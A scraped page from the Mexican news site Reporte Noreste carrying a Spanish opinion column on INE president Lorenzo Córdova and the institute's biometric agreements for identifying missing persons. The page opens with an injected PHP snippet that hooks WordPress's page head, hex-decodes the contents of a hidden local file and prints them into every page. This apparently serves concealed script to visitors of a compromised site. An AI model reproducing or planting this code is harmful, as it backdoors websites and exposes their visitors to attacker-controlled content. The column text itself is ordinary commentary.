if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } La bala de plata – Reporte Noreste
Conéctate con nosotros

Norte de Veracruz

La bala de plata

La bala de plata

De manera por demás neófita y estulta hay quienes se atreven a señalar a Lorenzo Córdova Vianello como un presidenciable de cara a la sucesión de Andrés Manuel López Obrador, sin embargo, eso es imposible.

Legalmente Córdova queda inhabilitado a participar en algún cargo de elección popular para el 2024; su trabajo como presidente consejero del Instituto Nacional Electoral (INE)  finaliza en abril de 2023 y hasta ahí el corrido de Lorenzo.

Se sabe que la elección del 2024 se puede hacer con las reglas actuales del INE, por eso el interés desesperado y dictatorial de modificar las reglas del juego con una Ley Electoral impulsada desde Palacio Nacional.

Así mientras todo eso sucede entorno al INE, máximo árbitro electoral en México, Lorenzo alias “La Bala de plata”, sigue dando de qué hablar, pues recientemente estableció un convenio de colaboración para la identificación de personas desaparecidas.

En un México administrado por políticos tan violentos, sangrientos e inhumanos las herramientas e información en poder del INE son vitales para encontrar justicia.

La confianza de los mexicanos depositada en el INE ha permitido que a la fecha se haya logrado el  reconocimiento de 16 mil 671 personas víctimas de la violencia, esto, gracias a los datos que entregamos al instituto a la hora de tramitar la credencial electoral.

Lorenzo anda emitiendo mensajes semanales, en el último, resaltó la firma de los acuerdos que estableció con las autoridades de Coahuila y Nuevo León, para poner a su disposición el servicio de confronta de biométricos con los registros del padrón electoral.

¿Para qué? Para aprovechar la base de datos más grande y confiable del país con más de 94 millones 164 mil personas inscritas, y que gracias a los biométricos se convierte en el principal mecanismo de identidad ciudadana.

Ya ve, y usted que anda permitiendo que desaparezcan y aplasten al INE cuando nunca se sabe si algún día ocupará o tendrá que echar mano de su información.

En la intimidad… Contando con la participación de 240 nadadores provenientes de los estados de Veracruz, Nuevo León, San Luis Potosí, Querétaro, Sonora, Oaxaca, Estado de México y Tamaulipas, se realizó exitosamente en playa Miramar la competencia “Vuelta al Faro 3.0”.

davidcastellanost@hotmail.com
@dect1608

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Norte de Veracruz